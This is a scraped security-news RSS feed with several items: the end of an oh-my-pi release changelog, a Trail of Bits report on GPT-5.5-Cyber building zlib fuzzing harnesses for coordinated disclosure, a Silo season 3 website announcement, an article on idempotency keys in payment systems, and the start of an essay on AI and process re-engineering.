<li>perf: streaming-reveal/render throughput + core hot-path optimizations by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oldschoola/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oldschoola">@oldschoola</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4772486225" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/3843" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/3843/hovercard" href="https://github.com/can1357/oh-my-pi/pull/3843">#3843</a></li>
<li>fix(session): converge plan mode on ask/resolve across continuation paths by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/metaphorics/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/metaphorics">@metaphorics</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4778129627" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/3911" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/3911/hovercard" href="https://github.com/can1357/oh-my-pi/pull/3911">#3911</a></li>
<li>fix(task): scan OMP extension agents/ dirs in discoverAgents by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4780460395" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/3922" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/3922/hovercard" href="https://github.com/can1357/oh-my-pi/pull/3922">#3922</a></li>
<li>fix(coding-agent): stopped isolated task merges failing when working tree carries WIP for files the agent also modifies by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4785497810" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/4140" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/4140/hovercard" href="https://github.com/can1357/oh-my-pi/pull/4140">#4140</a></li>
<li>fix(tui): animate live tool spinners by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4788171973" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/4172" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/4172/hovercard" href="https://github.com/can1357/oh-my-pi/pull/4172">#4172</a></li>
<li>fix(robomp): run sandbox setup/teardown off the event loop safely by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/metaphorics/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/metaphorics">@metaphorics</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4789853833" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/4184" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/4184/hovercard" href="https://github.com/can1357/oh-my-pi/pull/4184">#4184</a></li>
<li>fix(coding-agent): scope discoverExtensionPaths to native extension-module provider by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4791333341" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/4202" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/4202/hovercard" href="https://github.com/can1357/oh-my-pi/pull/4202">#4202</a></li>
<li>fix(model-discovery): auto-update ZenMux models into models.db without a key by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/metaphorics/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/metaphorics">@metaphorics</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4791367044" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/4204" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/4204/hovercard" href="https://github.com/can1357/oh-my-pi/pull/4204">#4204</a></li>
<li>fix(coding-agent): cache plugin extension resolution by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4791383356" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/4209" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/4209/hovercard" href="https://github.com/can1357/oh-my-pi/pull/4209">#4209</a></li>
<li>fix(providers): hydrate runtime model cache before selection by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4791806327" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/4217" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/4217/hovercard" href="https://github.com/can1357/oh-my-pi/pull/4217">#4217</a></li>
<li>fix(session): keep model switches active after rate limits by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4791982615" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/4221" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/4221/hovercard" href="https://github.com/can1357/oh-my-pi/pull/4221">#4221</a></li>
<li>fix(coding-agent): guard custom tool process exits during load by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4570706556" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1706" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1706/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1706">#1706</a></li>
<li>fix(tui): stop /move overlay from statting every entry per keystroke by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4791327639" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/4200" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/4200/hovercard" href="https://github.com/can1357/oh-my-pi/pull/4200">#4200</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/can1357/oh-my-pi/compare/v16.3.1...v16.3.2"><tt>v16.3.1...v16.3.2</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Field reports from Patch the Planet]]></title>
<description><![CDATA[We’re running Patch the Planet, an ongoing collaboration with OpenAI that pairs Trail of Bits engineers directly with more than 30 open-source projects. Its goal is to front-run a serious problem facing open-source maintainers: highly capable models like GPT-5.5-Cyber will soon create a firehose ...]]></description>
<link>https://tsecurity.de/de/3640928/it-security-nachrichten/field-reports-from-patch-the-planet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640928/it-security-nachrichten/field-reports-from-patch-the-planet/</guid>
<pubDate>Thu, 02 Jul 2026 13:23:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>We’re running <a href="https://trailofbits.com/patch-the-planet">Patch the Planet</a>, an ongoing collaboration with OpenAI that pairs Trail of Bits engineers directly with more than 30 open-source projects. Its goal is to front-run a serious problem facing open-source maintainers: highly capable models like GPT-5.5-Cyber will soon create a firehose of bug reports, and OSS maintainers are already spread thin. Our plan is to point OpenAI’s latest models at real codebases, find the security bugs first, work with maintainers to patch them, and find ways to decrease the burden on maintainers in the long run.</p>
<p>This post compiles field reports from Patch the Planet. We’ll update it as the initiative progresses with insights on model capabilities, bespoke tooling for maintainers, and industry guidance. Follow this blog for updates.</p>
<h2>Field report 1: GPT-5.5-Cyber built a custom fuzzing harness for zlib</h2>
<p><em>Authored by <a href="https://blog.trailofbits.com/authors/benjamin-samuels/">Benjamin Samuels</a></em></p>
<p>The expertise barrier that kept bespoke fuzzing campaigns out of reach for most attackers is gone. <strong>We watched GPT-5.5-Cyber build in a single day what would have taken weeks for a skilled security researcher</strong>: harnesses across a dozen entrypoints, sanitizer and variant builds, seeds, and multiple findings currently undergoing coordinated disclosure.</p>
<p>This particular instance focused on <a href="https://github.com/madler/zlib">zlib</a>, a widely used data format and lossless data compression software library. We pointed GPT-5.5-Cyber at the library and drove it through Codex with the <code>/goal</code> command, asking it to find a specific class of bugs that are critically dangerous in compression libraries. We’ll publish the full harness and findings for inspection once the vulnerabilities are patched and a new release is cut.</p>
<h3>The lab GPT-5.5-Cyber built in a day</h3>
<p>We didn’t tell the model how to find these bugs. The obvious first move is to read the source code, but zlib has been reviewed so thoroughly that there’s little left to find that way. GPT-5.5-Cyber worked that out for itself, judged static review to be a poor use of tokens, and decided the higher value path was to build fuzz tooling to dynamically test the code. Earlier models given the same goal tend to read the code and flag whatever looks suspicious, ultimately leading to mediocre outcomes.</p>
<p>We believe the frontier 5.5-Cyber model combined with the <code>/goal</code> feature is what let it execute end-to-end without hand-holding. <code>/goal</code> forced the objective to live across multiple turns and compactions so the model held scope, and 5.5-Cyber was smart enough to reject weak findings, expand coverage when a line of investigation died, and keep running until it had workable proof-of-concepts backed by sanitizer output.</p>
<p>Over the next several hours, it built the campaign out one piece at a time:</p>
<ul>
<li>It used ASan and UBSan builds so memory errors became observable.</li>
<li>It repurposed existing edge-case tests as guidance for the fuzz seed corpus.</li>
<li>It wrote C/C++ harnesses across a dozen entrypoints, including inflate, inflateBack, uncompress2, gzFile, MiniZip, puff, blast, infback9, gzjoin, gzappend, and several contrib stream wrappers.</li>
<li>It used compile-time variant builds (<code>INFLATE_STRICT</code>, <code>BUILDFIXED</code>, <code>PKZIP_BUG_WORKAROUND</code>, etc.) to reach code that the default zlib build hides.</li>
</ul>
<p>Each of these decisions is routine on its own, but stringing them together in the right order across a dozen entrypoints, without being handed the steps, is a relatively large shift in how capable frontier models are.</p>
<p>While zlib already has fuzzing coverage from its OSS-Fuzz harness, GPT-5.5-Cyber went beyond the default harness shape, which passes random inputs to the gz* APIs. Instead of directly fuzzing the gz* APIs, its most successful harness found bugs in valid gz* states that could only be constructed by operating system backpressure.</p>
<h3>Reporting discipline is the hard part</h3>
<p>In general, models tend to struggle with deciding when a finding is severe enough to justify escalating it into reporting. Weaker models tend to escalate bugs that cause the program to crash, but are not reachable under real-world conditions. Early on, GPT-5.5-Cyber hit a null callback crash in <code>inflateBack</code>. The crash was real, but reaching it required a caller to set up a state that was extraordinarily unlikely in real-world conditions, so the model logged it as unreachable and moved on. This agent kept going without human intervention and found several higher-impact issues.</p>
<p>That discipline is the whole game. The value of the zlib harness came from automation plus <strong>a strict definition of what counted as a reportable finding</strong>. Without strong validity rules baked into the goal and a model truly capable of evaluating those rules, the agent will generate mountains of noise with high confidence: invalid uses of the public API, expected parser errors, internal API misuse, etc.</p>
<h3>The moat is gone</h3>
<p>Setting up a bespoke fuzzing campaign used to mean finding someone who could write harnesses, reason about valid API state, and differentiate between a bug and a crash that can’t happen in practice. This asymmetry kept casual attackers out of the game for most targets.</p>
<p>That moat is mostly gone now, and it shifts the threat model in two directions at the same time. For a skilled researcher, it is a force multiplier: the weeks-long tax on every new target drops to a day or less, so the same person can audit far more code. For a low-skill attacker, the floor rises: the tedious, expertise-heavy work of getting a harness off the ground can now be driven by starting a goal and supervising the loop.</p>
<p>For anyone shipping security-critical code, the practical takeaway is clear. Bespoke fuzzing is no longer a luxury reserved for projects with mature OSS-Fuzz coverage, and it is no longer expensive for the people whom you would rather not have running it. The defensive move is to do it first, with the validity rules that turn agent output into a high-signal source you can act on.</p>
<h3>Lessons learned</h3>
<p>The fuzzing lab answered the question we came in with and left us a much bigger one. We didn’t ask GPT-5.5-Cyber to build a fuzzing campaign; it decided that was the job and did it. The thing worth watching for now is what else these new models will reach for once you hand them a goal and step back, especially the approaches we would never have thought to ask for before.</p>
<p>That is also why the front-running work being done by Patch the Planet matters. Every new capability that helps us find bugs faster is just as available to an attacker, so the advantage goes to whoever finds the bugs and fixes them first.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple’s New Silo Season 3 Website Reveals Exclusive Clips and Easter Eggs]]></title>
<description><![CDATA[Apple has launched a new website for Silo season 3 ahead of the show’s premiere on Apple TV, giving fans a closer look at the world, story clues, and hidden details connected to the new season.



The website, called How Did We Lose This World?, lets visitors explore files and folders through a v...]]></description>
<link>https://tsecurity.de/de/3640614/ios-mac-os/apples-new-silo-season-3-website-reveals-exclusive-clips-and-easter-eggs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640614/ios-mac-os/apples-new-silo-season-3-website-reveals-exclusive-clips-and-easter-eggs/</guid>
<pubDate>Thu, 02 Jul 2026 11:11:02 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple has launched a new website for Silo season 3 ahead of the show’s premiere on Apple TV, giving fans a closer look at the world, story clues, and hidden details connected to the new season.



The website, called How Did We Lose This World?, lets visitors explore files and folders through a virtual Mac-style desktop. It includes exclusive clips from Silo season 3, cryptic images, easter eggs, and visual hints that connect to the show’s wider mystery.



Silo Season 3 Premiere Date



Silo season 3 premieres Thursday, July 2, at 9:00 p.m. ET / 6:00 p.m. PT on Apple TV. The new season continues Juliette Nichols’ story after her forced cleaning, while also exploring the “Before Times” through Helen Drew and Congressman Daniel Keene.



The season brings an origin story set centuries earlier and follows events that lead to major consequences for the underground society.



Apple TV costs $12.99 per month, with discounted access available through the Apple One bundle.]]></content:encoded>
</item>
<item>
<title><![CDATA[Why an idempotency key isn’t an idempotency guarantee]]></title>
<description><![CDATA[It started with a one-line message from a finance team on a Tuesday afternoon: A handful of customers had been charged twice that day, and one was disputing a duplicate charge with their bank.



I went straight to the monitoring, expecting to find something broken. Instead, everything looked hea...]]></description>
<link>https://tsecurity.de/de/3640602/ai-nachrichten/why-an-idempotency-key-isnt-an-idempotency-guarantee/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640602/ai-nachrichten/why-an-idempotency-key-isnt-an-idempotency-guarantee/</guid>
<pubDate>Thu, 02 Jul 2026 11:04:39 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>It started with a one-line message from a finance team on a Tuesday afternoon: A handful of customers had been charged twice that day, and one was disputing a duplicate charge with their bank.</p>



<p>I went straight to the monitoring, expecting to find something broken. Instead, everything looked healthy: By the system’s own records, every order had been paid exactly once. It took the team a month of digging through production incidents to close the gap between a dashboard that said, “all good,” and a customer billed twice.</p>



<p>I’ve since seen this kind of failure across multiple payment systems, some handling hundreds of thousands of transactions a day. What follows is a composite and doesn’t describe any single system or organization. The numbers, timings and identifying details have been changed to keep anything proprietary out.</p>



<h2 class="wp-block-heading">The retry that charged twice</h2>



<p>A customer clicked Pay; the order service called the payment service, which called the external provider. The provider charged the card for $200 and recorded a success on its side.</p>



<p>The only thing that went wrong was timing. The provider was under load and took just over 3 seconds to answer. The client gave up after 2 seconds, a default inherited from internal service calls and never tuned for payments. From the caller’s side, the call had simply failed, so nothing was marked as paid.</p>



<p>The retry logic did what it was built to do and sent the request again. The provider saw what looked like a fresh charge and took the money a second time. The database recorded one payment: the retry. The first charge lived only in the provider’s records, invisible to us until the complaints came in.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/idempotentecy-1.png?w=1024" alt="The database recorded one payment: the retry. The first charge lived only in the provider's records, invisible to us until the complaints came in." class="wp-image-4191747" width="1024" height="462" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Violetta Pidvolotska</p></div>



<p>The duplicates were refunded within hours, before the dispute could become a chargeback. Understanding what had actually failed took much longer.</p>



<p>Later, we widened the timeout well past the provider’s slowest healthy responses, but as long as a retry can trigger a second charge, a longer timeout only makes the double charge rarer.</p>



<p>The real mistake was older than the limit itself. The system had been told that a timeout means failure.</p>



<h2 class="wp-block-heading">The third state</h2>



<p>We tend to think of a network call as having two outcomes: it worked or it didn’t. A timeout is the third. The request may never have arrived. It may have done its work and lost the response on the way back. That is what bit us. Or it may still be running. From the caller’s side, you can’t tell which.</p>



<p>Code rarely has a separate path for “unknown.” It gets lumped in with failure and the failure path retries. When the request moves money, that is how you charge someone twice.</p>



<p>A slow service shows up as rising response times, an unreliable one as errors. A double charge shows up as a success, and nobody noticed until a customer did.</p>



<p>Timeouts, which I’ve <a href="https://www.infoworld.com/article/4137968/the-reliability-cost-of-default-timeouts.html">written about before</a>, turn silent hangs into visible failures. And visible failures get retried, which is how we arrived at idempotency.</p>



<p>“Exactly-once” gets used as if it were a setting you could turn on. You cannot promise exactly-once delivery across an unreliable network, as Tyler Treat explains. What you can promise is exactly-once effects: The request may arrive twice, while the charge happens once.</p>



<p>My first instinct was to stop retrying payments automatically and it helped. But not every retry is ours to switch off: The customer refreshes the page, or a retry policy somewhere in the infrastructure resends on its own.</p>



<h2 class="wp-block-heading">The assumptions under the key</h2>



<p>The standard remedy is an idempotency key: The caller attaches a unique value to one attempt at an operation and sends the same value on every retry. A new key gets processed and its result stored; a familiar one gets the stored result back, so the retry has no extra effect. Brandur Leach’s <a href="https://brandur.org/idempotency-keys">walkthrough of Stripe-like idempotency keys in Postgres</a> lays the pattern out end to end.</p>



<p>The key was shipped and the duplicates stopped. But we relaxed too early. The key turned out to be the easy part.</p>



<p>A key like this rests on four assumptions. I’ve since turned them into a checklist I call the four-assumptions test:</p>



<ul class="wp-block-list">
<li><strong>Claim.</strong> Claiming a key is just a matter of checking it’s free first.</li>



<li><strong>Intent.</strong> The same key always carries the same intent.</li>



<li><strong>Memory.</strong> Whatever a key remembers is safe to replay.</li>



<li><strong>Boundary</strong>. Nothing behind the key lies beyond your control.</li>
</ul>



<p>Over the following month, all four broke: The race in a load test, the other three in production.</p>



<h2 class="wp-block-heading">Two requests, same millisecond</h2>



<p>In a load test, two requests with the same key arrived in the same millisecond. Each checked for the key; neither found it and both started processing.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/idempotentecy-2.png?w=1024" alt="In a load test, two requests with the same key arrived in the same millisecond. Each checked for the key, neither found it and both started processing." class="wp-image-4191749" width="1024" height="531" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Violetta Pidvolotska</p></div>



<p>“Check whether the key exists, then write it” is a race like any other and it broke the claim assumption. We fixed it by flipping the order: now writing the key <em>is</em> the check. Every request writes it as “started” and the database lets only one claim win. The safeguard:</p>



<pre class="wp-block-code"><code>-- Try to claim the key; the UNIQUE index lets only one caller win.
INSERT INTO operations (idempotency_key, state) VALUES (:key, 'started')
ON CONFLICT (idempotency_key) DO NOTHING;</code></pre>



<p>The insert touches one row or none, and that count tells you which path you’re on. One row means you won: Call the provider, then mark the row ‘completed’ and save the response. None means you lost: Read the row and return its saved response or tell the caller to retry later if it is still ‘started’.</p>



<p>One detail is easy to get wrong: Commit the claim before the provider call goes out. Otherwise, a crash rolls it back and erases the only record that a charge may be in flight.</p>



<p>The harder case is a winning request that crashes mid-charge: Its key is stuck at “started,” and every retry is told to wait for an answer that will never come. A stuck claim is the same unknown all over again: Once it has sat in “started” longer than any healthy call could take, ask the provider what actually happened before anyone charges again.</p>



<h2 class="wp-block-heading">Same key, different request</h2>



<p>The second gap appeared a week into production and broke the intent assumption: A caller reused one key for two different requests, $200 and $500, and the system returned the first request’s stored response without noticing the amount had changed.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/idempotentecy-3.png?w=1024" alt="The second gap appeared a week into production and broke the intent assumption: a caller reused one key for two different requests, $200 and $500, and the system returned the first request's stored response without noticing the amount had changed." class="wp-image-4191748" width="1024" height="443" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Violetta Pidvolotska</p></div>



<p>We fixed it by storing a fingerprint of the request’s contents next to the key, on the same insert, so a request that loses the claim race can still compare its fingerprint against the winner’s. If the fingerprints match, it’s a genuine retry. If they don’t, the key was reused for a different operation and we reject it.</p>



<p>That fix promptly rejected a valid retry. We had been fingerprinting the entire request, including a timestamp that changed between attempts and fields that arrived in a different order, so the fingerprints did not match.</p>



<p>A fingerprint has to capture what a request means rather than how its bytes are arranged. Hash a hand-picked list of business fields and you risk a silent collision: The one field nobody remembered to add lets two different requests match. Hash the whole request minus known noise like timestamps and the failure is loud instead: A missed volatile field rejects a valid retry. We chose loud, the fix came down to two lines:</p>



<pre class="wp-block-code"><code>intent      = drop_fields(request.json, volatile={"client_ts", "trace_id"})  # strip known noise only
fingerprint = sha256(canonical_json(intent))   # canonical form: keys sorted, numbers and spacing normalized</code></pre>



<p>Even “canonical” hides decisions. <a href="https://www.rfc-editor.org/info/rfc8785/">RFC 8785</a> pins them down, but it runs every number through an IEEE 754 double, which loses precision on large values, so money amounts are safer as strings or integer cents. Change the canonical form and every stored fingerprint stops matching, so we version it and store the version next to the fingerprint.</p>



<h2 class="wp-block-heading"><a></a><strong>The error we cached</strong></h2>



<p>The third gap came in through support: A customer hit an insufficient-funds decline, added money, tried again with the same key and got the old “insufficient funds” back. The provider was never asked. The system had been caching every response, declines included, so the failure stuck to the key.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/idempotentecy-4.png?w=1024" alt='The third gap came in through support: a customer hit an insufficient-funds decline, added money, tried again with the same key and got the old "insufficient funds" back. The provider was never asked. The system had been caching every response, declines included, so the failure stuck to the key.' class="wp-image-4191746" width="1024" height="579" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Violetta Pidvolotska</p></div>



<p>That forced the question behind the memory assumption: What is a key allowed to remember? The rule we landed on: cache only success.</p>



<p>A soft decline or a validation error releases the claim instead: The row flips back to claimable, fingerprint kept. The next attempt reclaims it with an update that only one retry can win and the customer who adds money gets a live attempt instead of a replay. Hard declines are the exception: A stolen-card response is final and that claim stays closed.</p>



<p>On a timeout, we don’t know whether the charge landed, so we ask the provider whether the charge already went through and act on the answer.</p>



<h2 class="wp-block-heading">Where the guarantee runs out</h2>



<p>The first three gaps were on endpoints under the team’s control. The fourth surfaced during reconciliation: A charge on an older provider’s statement with no matching internal record. That provider had no idempotency keys, and the guarantee had reached its boundary. We could not make it safe to call twice.</p>



<p>We got as close as we could: A pending record before the call, a status check before retrying, reconciliation to catch and refund whatever slips through. A window remains where the charge has landed and our record doesn’t know it yet. We kept shrinking that window, but we never managed to close it.</p>



<p>The database that holds the keys forces a decision of its own: When it is down, you either stop taking payments or take them unprotected. That choice is a business call. For a low-stakes write, cleaning up a rare duplicate can cost less than turning customers away. A payment is not low stakes, so we fail closed and stop taking payments until the store is back: A lost sale we can recover, and we had just spent a month learning what duplicates cost.</p>



<h2 class="wp-block-heading">Questions I ask in design reviews</h2>



<p>For anything that stores or changes data, I ask three questions:</p>



<ul class="wp-block-list">
<li><strong>What happens if this runs twice?</strong> Ask it out loud for every write.</li>



<li><strong>Can we prove the answer?</strong> Run it twice in tests, in sequence and in parallel; the second run should change nothing.</li>



<li><strong>Where does the truth live when systems disagree?</strong> For payments, it’s the provider because their records show whether money actually moved. Settle whose answer wins before an incident does.</li>
</ul>



<p>The key is a good idea and, in anything that moves money, a necessary one. It is just not a guarantee. The guarantee is the design around it: A claim that cannot race, an intent the fingerprint confirms, a memory that keeps only what is safe to replay and a boundary you have mapped in advance. That is the four-assumptions test. Every assumption gets tested eventually: You do it at design time or production does it for you.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.infoworld.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why AI savings are an illusion without process re-engineering]]></title>
<description><![CDATA[The PC was heralded as revolutionary; it was going to save time, revolutionize our work… But it became an opportunity lost. Paper became digital files. Filing cabinets became shared drives. Memos became email. We sometimes worked faster. We did not necessarily work differently. And we certainly d...]]></description>
<link>https://tsecurity.de/de/3640590/it-nachrichten/why-ai-savings-are-an-illusion-without-process-re-engineering/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640590/it-nachrichten/why-ai-savings-are-an-illusion-without-process-re-engineering/</guid>
<pubDate>Thu, 02 Jul 2026 11:03:36 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The PC was heralded as revolutionary; it was going to save time, revolutionize our work… But it became an opportunity lost. Paper became digital files. Filing cabinets became shared drives. Memos became email. We sometimes worked faster. We did not necessarily work differently. And we certainly did not work more efficiently. The underlying logic: approval chains, reporting cycles, hierarchies and incentives remained intact.</p>



<p>The internet and smartphones followed the same pattern, compressing time and distance. But neither forced enterprise changes. The tools changed. The organizational model did not. This stagnation is referred to as the Solow Productivity Paradox, a historic mismatch between massive technology investments and flat corporate productivity. And while the Internet boom did see a raise in productivity, it was due to investment in hardware, not so much due to a change in how we worked, as explained by <a href="https://www.cio.com/article/266741/it-organization-the-new-economy-what-productivity-miracle.html">Robert Gordon in The New Economy: What Productivity Miracle?</a></p>



<p>And now there’s Artificial Intelligence, AI. AI presents a different kind of challenge because it intervenes in cognition itself. It reaches much closer to the operating logic of the enterprise than previous technology waves.</p>



<p>Yet, once again, the response is surface adaptation rather than structural reinvention. AI is layered onto inherited workflows, old approval thresholds, unclear accountability structures and sprawling software, then expecting cost savings to follow. And again, it is the investments in AI that garner any growth, not changes in corporate infrastructure.</p>



<p>This is not transformation. It is acceleration without reform. And this “slap on AI” will have as much long-term impact as the PC.</p>



<h2 class="wp-block-heading">Automation = efficiency? Wrong</h2>



<p><a href="https://www.cio.com/article/4151188/ways-cios-can-prove-to-boards-that-ai-projects-will-deliver.html.">Chief information officers</a> are under intense pressure to turn AI into measurable financial outcomes. In boardrooms, expectations are explicit: deploy AI, automate, reduce operating cost and show results within a budget cycle.</p>



<p>A central misunderstanding in AI programs is the assumption that if a process is costly and labour-intensive, automation creates efficiency. Unfortunately, what appears as inefficiencies are normalized fragmentations. With AI, hidden workflow contradictions become both significant and visible. Organizations discover it wasn’t running a slow but clean process. It was running an incoherent process that relied on human buffering to keep it functioning. This is precisely why so many AI efforts disappoint immediately after a dazzling pilot, degenerate into <a href="https://www.cio.com/article/4158000/ai-strategy-theater-why-cios-are-performing-innovation-instead-of-leading-it.html.">AI strategy theatre</a> and fail to scale.</p>



<p>When one part of the workflow becomes lightning-fast, but the surrounding process remains fractured, escalations multiply and the IT department, despite having done its job perfectly, is asked to fix the operational fallout with more tooling, more integration, more controls and more spend. The problem is rarely technical. But it becomes so very quickly.</p>



<p>I increasingly think the more useful concept here is <em>process debt</em>. CIOs are already comfortable talking about <a href="https://www.cio.com/www.cio.com/article/3958666/what-is-technical-debt-a-business-risk-it-must-manage.html">technical debt</a> and its complexities. <em>Process</em> <em>debt</em> is the upstream generator of that complexity. It accumulates when temporary fixes become permanent, when controls are added without removing older ones and when incidents leave behind workflows nobody dares to challenge. Over time, the process stops reflecting deliberate design and starts reflecting institutional memory, risk aversion and unresolved negotiations between functions.</p>



<h2 class="wp-block-heading">Case study 1: The regulated approval-heavy process</h2>



<p>I was brought into a regulated organization that wanted to identify opportunities for automation. The assumption was that technology was the main constraint. Workflows involved multiple reviews, approvals and handovers between departments. From a distance, it looked like an obvious candidate for automation.</p>



<p>It was a familiar situation: delays, duplicated effort and frustration with how long routine work was taking to complete. The process seemed overstaffed and underdesigned. The natural conclusion was that automation could remove unnecessary tasks and improve speed.</p>



<p>But as I began interviewing the stakeholders, a different picture emerged. Every group could explain its role in the workflow. But the more I listened, the clearer it became that nobody could describe the process as a coherent whole.</p>



